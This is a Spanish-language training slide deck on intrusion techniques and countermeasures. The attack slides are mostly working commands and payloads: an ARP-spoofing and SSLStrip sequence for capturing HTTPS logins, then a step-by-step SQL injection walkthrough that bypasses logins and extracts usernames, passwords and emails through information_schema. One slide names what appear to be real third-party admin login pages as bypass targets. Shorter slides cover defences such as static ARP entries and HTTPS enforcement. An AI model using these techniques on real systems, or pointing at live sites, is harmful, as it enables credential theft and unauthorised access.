  • 31. Tecnicas de Intrusion (Backtrack) y Contramedidas. Ejemplo de una red, EL ANTES :)
  • 32. Tecnicas de Intrusion (Backtrack) y Contramedidas. Que es el MITM? En criptografía, un ataque man-in-the-middle (MitM o intermediario) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. Ejemplo de una red Infectada, EL DESPUES XD
  • 33. Tecnicas de Intrusion (Backtrack) y Contramedidas. Que es SSL & TLS? SSL stands for Secure Sockets Layer, though I.E.T.F. (Internet Engineering Task Force) has renamed it TLS (Transport Layer Security). TLS is documented in RFC 2246 and identifies itself in the protocol version field as SSL 3.1. De donde viene SSL/TLS come from? SSL was developed by Netscape, and is used extensively by web browsers & crawlers to provide secure connections for transferring sensitive data, such as credit card numbers and login authentication. An SSL-protected HTTP transfer uses trusted port 443 (instead of HTTP's normal port 80), and is identified with a special URL method ”https.” Thus, https://mail.google.com/ would cause an SSL-enabled browser to open a secure SSL session to trusted port 443 at mail.google.com.
  • 34. Tecnicas de Intrusion (Backtrack) y Contramedidas. Puertos Seguros o ”Trusted Ports?” This is one of the first security patterns implemented on the internet, via ”r” or remote programs. The idea is that all ports below 1024 were assigned ONLY to system processes. This means remote connections were trusted because if the port was below 1024 it was a system process and not a user/client. This affects layer 4 ”Transport” of the OSI-Model and the protocols involved were TCP and UDP. It should be noted that this is an old process for security that modern encryption has replaced via SSH. Que es SSLStrip? Es una tool que nos permite sniffar usuarios y contraseñas encriptadas en HTTPS. Esto lo hace realizando un ataque MITM entre el servidor y nuestro objetivo conectandose al servidor mediante HTTP (sin encriptar) en lugar de HTTPS (encriptado) con lo que los datos son visibles.
  • 35. Tecnicas de Intrusion (Backtrack) y Contramedidas. Como funciona SSLStrip?
  • 36. Tecnicas de Intrusion (Backtrack) y Contramedidas. Manos a la Obra XD nmap -sC -O 192.168.27.0/24 cat /proc/sys/net/ipv4/ip_forward echo "1" > /proc/sys/net/ipv4/ip_forward Redirige el trafico proveniente del puerto 80 al 8080 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080 ARP MITM arpspoof -i eth0 -t 192.168.27.199 192.168.27.1 python sslstrip.py -a -l 8080 -w captura tail -f captura (Esperando a las víctimas)
  • 37. Tecnicas de Intrusion (Backtrack) y Contramedidas. Como nos defendemos? Plugging Firefox http://enigform.mozdev.org/ https://www.eff.org/https-everywhere Greasemonkey + script redirect https NoScript + Config https Entradas estaticas no ARP (arp -s [ip_address] [mac_address]) Port Security: ARP Watch Estando atentos! (arp -a) IDS/IPS para detectar el Poisoning Recordar siempre: “Las contraseñas son como la ropa interior, debemos cambiarlas de tanto en tanto y nunca debemos compartirlas!!!”
  • 38. Tecnicas de Intrusion (Backtrack) y Contramedidas. Greasemonkey + script redirect https // ==UserScript== // @name https Link Rewriter for Facebook.com // @namespace http://not.existant // @description Rewrites the facebook.com links to use https. Created by Brian Quan // @version 1.1 // @include http://*.facebook.com/* // @include https://*.facebook.com/* // ==/UserScript== var allLinks = document.getElementsByTagName('a'); for(var i=0; i < allLinks.length; i++) { // check if the link href matches pattern allLinks[i].href = allLinks[i].href.replace('http://www.facebook.com','https://www.facebook.com'); allLinks[i].href = allLinks[i].href.replace('http://apps.facebook.com','https://apps.facebook.com'); } var allLinks2 = document.getElementsByTagName('form'); for(var i=0; i < allLinks2.length; i++) { allLinks2[i].action = allLinks2[i].action.replace('http://www.facebook.com','https://www.facebook.com'); allLinks2[i].action = allLinks2[i].action.replace('http://apps.facebook.com','https://apps.facebook.com'); }
  • 39. Tecnicas de Intrusion (Backtrack) y Contramedidas. Fake certificate? Null prefix attack? Si nos creamos nuestro propia CA? Spoof certificate? *0.midominio.com.ar
  • 40. Tecnicas de Intrusion (Backtrack) y Contramedidas. Herramientas Open Source para Segurizar Plataformas http://forkbomb.org/ninja/ Grsecurity (Kernel) Mod-Security (Apache) BSD (Firewalls Front End) Ossim (Monitoreo) Cacti/Nagios/Zabbix (Monitoreo) Auth2DB (Centralización de logs) SSL Kerberos (MIT) Snort Fail2Band Cabezota!
  • 41. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Sin lugar a dudas esta técnica es una de las mas peligrosas que hay en una aplicación, ya sea WEB o de Escritorio, por la potencia que tiene y la capacidad de poder ingresar a un sistema de una forma eficaz. Por practica puedo decir que es una de las vulnerabilidad mas comunes y una de las mas versátiles a la hora de pentestar un sistema =)
  • 42. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Según Wikipedia: "Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro. Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos." Hablando en criollo son variables no sanadas o filtradas incluidas en querys pudiendo este introducir comandos arbitrarios q luego seran interpretados por la DB
  • 43. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection SEGUN WIKIPEDIA bypass– se refiere, en general, a una ruta alternativa a otra normal. Bypass, en hacking, forma de esquivar un sistema de seguridad informático; o también enfoque distinto para solucionar un problema informático
  • 44. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Este es un panel echo a proposito con este bug Estas son las lineas del bug: Aqui lo que pasa por el formulario, el usuario y password lo llevamos a la variable $usuario y $password, luego automaticamente sin colocar alguna seguridadlo vuelca a la consulta SQL. Si yo colo como nombre admin y password 123456, la consulta arrojara un TRUE y traeria datos de la base de datos ya que para el usuario admin el password es 123456.
  • 45. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Nota: los string en msql son delimitados por comillas simples (') entonces nosotros para poder inyectar tendremos q escaparnos o cerrar esta comilla simple. SELECT * FROM usuarios WHERE usuario=''' AND password='' como vemos en el campo usuarios hay 3 comillas simples las 2 de afuera son del programador y las del medio la nuestra . Esto arrojaria un error, en este caso seria el siguiente Error en la Consulta: SELECT * FROM usuarios WHERE usuario=''' AND password=''Error en la consultaYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND password=''' at line 1 Aqui mysql esta diciendo especificamte q hay una comilla simple sin cerrar =) eto es loq aprovechamos nosotros
  • 46. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Para bypasear el login facilmete sin saber el usuario y pasword podemos ingresar 'or 1=1-- . Esto lo q ahce es ingresar con el primer rejistro de nuestra tabla Usuarios. Para que se entienda mejor: SELECT * FROM usuarios WHERE usuario='' AND password=''or 1=1-- ' La comilla ingresada por nosotros cierra la primera comilla simple. Luego de cerrar podemos proceder a colocar nuestras sentencias. or 1=1 la sentencia or significa que si algo es verdadero entonces todo es verdadero, y como 1=1 es verdadero entonces toda nuestra consulta sera verdadera por mas que no hallamos dicho el usuario es igual a ''. Or se comporta de esta forma. 1- V or V = Verdadero 2- V or F = Verdadero 3- F or V = Verdadero * 4- F or F = Falso
  • 47. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection 'or 1=1-- ' = La Comilla ingresada por nosotros cumple la funcion de cerra la del programador. or 1=1 = La sentencia or significa q si algo es vedadero y en este caso segun el comportamiento de or 1=1 todo es verdadero. — = En SQL significa comentario, por loq encontonces todo lo q bien depues se lo toma com comentario
  • 48. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection http://www.specsdirect2u.co.uk/admin/admin_login.php 'or 1=1-- http://www.faba7.org.ar/adm/inicio.asp ' OR 1=1--
  • 49. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Como reconoser una web bulnerable? Agregando comilla simple ('), ")", ''/*'' , ''--'' o "#" al final del balor de la variable ej http://webvuln.com/archvo.php?id=1' http://webvuln.com/archvo.php?id=1) Se pude intentar con palabras del lenguaje sql como "select,order by" etc Y con opeadores logicos 1 and 1=1 , 1 and 1=2 "You have an error in your SQL syntax; check the manual that " o algo parecido .. sabemos que es vulnerable a sql injection.
  • 50. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Agregado operadores logicos 1 && 1 //Representa el AND 1 || 1 //Representa el OR 1 XOR 0 //Retorna null si alguno de ellos es null
  • 51. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Lo primero q hacemos es sacar el numero de columnas Com hacemos esto? usando order by o union select http://webvuln.com/vuln.php?id=-1 order by 1/* <---- no muestra un error http://webvuln.com/vuln.php?id=-1 order by 2/* <---- no muestra un error http://webvuln.com/vuln.php?id=-1 order by 15/* <-------- no muestra un error http://webvuln.com/vuln.php?id=-1 order by 16/* <-------- no muestra un error http://webvuln.com/vuln.php?id=-1 order by 17/* <-------- error
  • 52. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Ahora buscaremos la columna q printee las respuestas de nuestra inyeccion, generalemte los nu- meros q aprecen son los q printean Bien supongamos q en la web nos aparecio el numero 3 entonses para estar seguros hacemos lo siguiente index.php?id=-1+UNION+ALL+SELECT+1,2,version(),4-- esto nos devolveria com resultado la version de la db, este es un dato importante porq dependiendo de la version varia el ataque.
  • 53. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Informacion Util version () : Devuelve la versión del servidor MySQL. database() : Devuelve el nombre de la base de datos actual. current_user() : Devuelve el nombre de usuario y el del host para el que está autentificada la conexión actual. Este valor corresponde a la cuenta que se usa para evaluar los privilegios de acceso. Puede ser diferente del valor de USER(). last_insert_id() : Devuelve el último valor generado automáticamente que fue insertado en una columna AUTO_INCREMENT. connection_id() : Devuelve el ID de una conexión. Cada conexión tiene su propio y único ID. @@datadir directorio de la db.
  • 54. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection NOTA: El soporte para INFORMATION_SCHEMA está disponible en MySQL 5.X.X y posterior. Proporciona acceso a los metadatos de la base de datos. Metadatos son datos acerca de los datos, tales como el nombre de la base de datos o tabla, el tipo de datos de una columna, o permisos de acceso. Otros términos que a veces se usan para esta información son diccionario de datos o catálogo del sistema .
  • 55. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection INFORMATION_SCHEMA SCHEMATA proporciona información acerca de db. INFORMATION_SCHEMA TABLES proporciona información de las tablas en las db. INFORMATION_SCHEMA COLUMNS proporciona información de las columnas en las db. INFORMATION_SCHEMA STATISTICS proporciona información acerca de los índices de las tablas. INFORMATION_SCHEMA USER_PRIVILEGES proporciona información acerca de permisos globales. INFORMATION_SCHEMA SCHEMA_PRIVILEGES proporciona información acerca del esquema de permisos INFORMATION_SCHEMA TABLE_PRIVILEGES proporciona información de permisos de tablas. INFORMATION_SCHEMA COLUMN_PRIVILEGES proporciona información acerca de permisos de columnas. INFORMATION_SCHEMA CHARACTER_SETS proporciona información acerca de los caracteres disponibles. INFORMATION_SCHEMA COLLATIONS proporciona información acerca de colaciones para cada conjunto de caracteres. INFORMATION_SCHEMA COLLATION_CHARACTER_SET_APPLICABILITY indica qué conjunto de caracteres es aplicable a cada colación. INFORMATION_SCHEMA TABLE_CONSTRAINTS describe qué tablas tienen restricciones. INFORMATION_SCHEMA KEY_COLUMN_USAGE describe qué columnas clave tienen restricciones. INFORMATION_SCHEMA ROUTINES proporciona información acerca de rutinas almacenadas (procedimientos y funciones). INFORMATION_SCHEMA VIEWS proporciona información acerca de las vistas en las bases de datos. INFORMATION_SCHEMA TRIGGERS proporciona información acerca de disparadores.
  • 56. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Exploramos las tablas con la funcion information_schema La sintaxis seria la siguiente .php?id=-1+union+select+1,2,3,4,5+from+information_schema.tables-- Ahora pedimos el tablename pero para esto tenemos que encontrar la columna vulerable .php?id=-1+union+select+table_name,2,3,4,5+from+information_schema.tables-- .php?id=-1+union+select+1,table_name,3,4+from+information_schema.tables-- .php?id=-1+union+select+1,2,table_name,4+from+information_schema.tables-- .php?id=-1+union+select+1,2,3,table_name+from+information_schema.tables-- primera tabla es CHARACTER_SETS
  • 57. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Ahora navegamos por las tablas, para esto agergamos +limit+1,1-- al final de la inyeccion q tenemos -1+union+select+1,2,table_name,4+from+information_schema.tables+limit+1,1-- cambiando el valor del limit vamos sacando los nombres de las tablas .php?id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+1,1-- COLLATIONS .php?id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+2,1-- COLLATION_CHARACTER_SET_APPLICABILITY -1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+3,1-- COLUMNS
  • 58. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Ya exploramos todas las tablas y tenemos los nombres, ahora elejimos la que cosideremos importante por ejeplo usuarios. Vamos a ver las columas q tiene dicha tabla, esto se logra practicamte como lo hicimos con las columnas anteriormente pero ahora usaremos el information_schema.columns y le diremos que nos de las columnas de usuarios, lo aremos de la siguiente manera http://web.com/vuln.php?id=- 1+union+select+1,2,column_name,4,5+from+information_schema.c olumns+where+table_name=char(85,115,117,97,114,105,111,115)
  • 59. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection
  • 60. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Aqui la explicacion +where+table_name=char(85,115,117,97,114,105,111,115) where ( donde ) table_name ( nombre de la tabla ) char(85,115,117,97,114,105,111,115) es el nombre de la tabla Usuarios en ASCII 85 =U 115=s 117=u 97 =a 114=r 105=i 111=o 115=s lista de valores en asii http://www.ascii.cl/es/
  • 61. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Hacemos lo mismo agregamos el limit y vamos scando las columnas de la tabla users .php?id_rubro=- 1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=char(85,115,117,97, 114,105,111,115) .php?id=- 1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=char(85,115,117,97, 114,105,111,115)+limit+2,1-- .php?id=- 1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=char(85,115,117,97, 114,105,111,115)+limit+3,1-- +limit+2,1--
  • 62. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Ya tenemos las tablas y las columnas ahora usaremos la funcion concat_ws que concatena las columnas para extraer sus datos Nos quedaria algo asi: php?id=-1+union+select+1,2,concat_ws(0x3a,Usser,Pass,email_usuario),4,5+from+Usuarios . En el caso q exista mas de un usuario se agrega nuevamte el limit para navegar entre ellos nota: el primer 0x3a es el codigo Hexadecimal de el caracter : asi con eso separamos los datos
  • 63. Tecnicas de Intrusion (Backtrack) y Contramedidas. SQL Injection Ya tenemos las tablas y las columnas ahora usaremos la funcion concat_ws que concatena las columnas para extraer sus datos Nos quedaria algo asi: php?id=-1+union+select+1,2,concat_ws(0x3a,Usser,Pass,email_usuario),4,5+from+Usuarios . En el caso q exista mas de un usuario se agrega nuevamte el limit para navegar entre ellos nota: el primer 0x3a es el codigo Hexadecimal de el caracter : asi con eso separamos los datos
  • 64. Tecnicas de Intrusion (Backtrack) y Contramedidas. Tools GIE Sqlimput Metasploit SQLix SQLi Scanner by f-security
  • 65. Tecnicas de Intrusion (Backtrack) y Contramedidas.  Espero que les haya gustado Dudas? | Preguntas? Se aburrieron?  oscar.gonzalez@ianux.com.ar  gabriel.ramirez@ianux.com.ar  oscar.gonzalez@saltalug.org.ar
  • 66. Tecnicas de Intrusion (Backtrack) y Contramedidas. Muchas gracias!!!!